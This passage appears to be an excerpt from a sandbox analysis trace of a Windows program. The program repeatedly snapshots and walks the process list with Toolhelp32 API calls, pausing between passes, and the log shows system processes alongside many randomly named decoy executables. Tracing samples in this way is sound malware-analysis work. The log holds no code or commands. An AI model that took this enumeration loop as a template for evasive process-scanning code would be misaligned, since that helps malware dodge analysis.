hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0120.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0120.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0120.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0120.211] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0120.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0120.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0120.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0120.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0120.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0120.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0120.883] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0120.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0120.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0120.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0120.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0120.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0120.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0120.895] CloseHandle (hObject=0xbc) returned 1 [0120.895] Sleep (dwMilliseconds=0x12c) [0124.481] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0124.487] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0124.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0124.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0124.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0124.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0124.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0124.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0124.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0124.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0124.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0124.507] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0124.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0124.510] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0124.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.797] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0124.798] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0124.799] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0124.800] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0124.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0124.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0124.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0124.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0124.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0124.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0124.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0124.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0124.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0124.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0124.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0124.814] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0124.816] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0124.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0124.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0124.819] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0124.820] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0124.821] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.822] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0124.823] CloseHandle (hObject=0xc4) returned 1 [0124.824] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0125.074] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0125.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0125.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0125.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0125.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0125.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0125.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0125.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0125.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0125.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
